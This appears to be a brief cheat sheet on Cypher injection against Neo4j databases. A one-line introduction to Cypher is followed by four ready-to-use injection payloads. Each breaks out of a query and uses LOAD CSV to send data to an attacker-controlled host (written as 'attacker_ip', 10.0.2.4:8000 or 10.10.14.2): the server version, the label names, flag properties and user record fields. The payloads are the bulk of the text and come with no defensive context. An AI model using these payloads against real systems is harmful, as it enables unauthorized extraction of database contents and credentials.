Cypher is Neo4j's graph query language that lets you retrieve data from the graph. It uses βan ASCII-art type of syntax,β in which rounded brackets are used to represent nodes and square brackets represent relationships. If that sounds familiar, it's inspired by SQL (according to Neo4j).
Injection
Server version:
' OR 1=1 WITH 1 as a CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.0.2.4:8000/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 //
Labels (like columns)
'}) RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://attacker_ip /?l='+label as l RETURN 0 as _0
Get information from labels (data)
' OR 1=1 WITH 1 as a MATCH (f:Flag) UNWIND keys(f) as p LOAD CSV FROM 'http://10.0.2.4:8000/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
With WHERE clause:
' OR 1=1 WITH 1 as a MATCH (u:user) WHERE u.id=1 UNWIND keys(u) as p LOAD CSV FROM 'http://10.10.14.2/?' + p +'='+toString(u[p]) as l RETURN 0 as _0 //
